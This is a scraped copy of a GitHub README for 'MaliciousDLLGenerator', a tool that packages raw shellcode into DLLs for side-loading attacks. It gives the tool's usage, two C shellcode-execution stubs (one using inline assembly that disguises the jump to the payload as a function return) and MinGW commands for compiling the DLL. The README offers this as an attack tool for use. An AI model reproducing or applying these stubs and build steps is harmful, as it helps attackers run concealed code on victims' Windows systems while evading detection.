48
GitHub - Mr-Un1k0d3r/MaliciousDLLGenerator: DLL Generator for side loading attac...
source link: https://github.com/Mr-Un1k0d3r/MaliciousDLLGenerator
Go to the source link to view the article. You can view the picture content, updated content and better typesetting reading experience. If the link is broken, please click the button below to view the snapshot at that time.
README.md
MaliciousDLLGenerator
DLL Generator for side loading attack
Currently only support 64 bits shellcode
Usage
$ python gen-dll.py -h
MaliciousDLLGenerator - Mr.Un1k0d3r - RingZer0 Team
---------------------------------------------------
[-] Shellcode size is limited to 1024 bytes
usage: gen-dll.py [-h] -o OUTPUT -s SHELLCODE [-t TYPE]
optional arguments:
-h, --help show this help message and exit
-o OUTPUT, --output OUTPUT
Output filename
-s SHELLCODE, --shellcode SHELLCODE
Raw shellcode file path
-t TYPE, --type TYPE DLL type (default,oart)
Shellcode gadget
Instead of using the standard shellcode calling structure
char shellcode[] = {};
int(*execute)(void);
execute = (int(*)())shellcode;
execute();
Which result in the following assembly code
call rax
The DLL is mimicking a standard function return by using the following code
CHAR payload[] = "";
asm volatile ("mov %%rax, %0\n\t"
"push %%rax\n\t"
"ret"
:
: "r" (payload));
Which result in following assembly code
mov rax, rsp
push rax
ret
Compiling from source using GCC
C:\> x86_64-w64-mingw32-g++.exe -Wall -DBUILD_DLL -O2 -c maindll.cpp -o maindll.o
C:\> x86_64-w64-mingw32-g++.exe -shared -Wl,--dll maindll.o -o yourdll.dll -s
Credit
Mr.Un1k0d3r RingZer0 Team
Recommend
About Joyk
Aggregate valuable and interesting links.
Joyk means Joy of geeK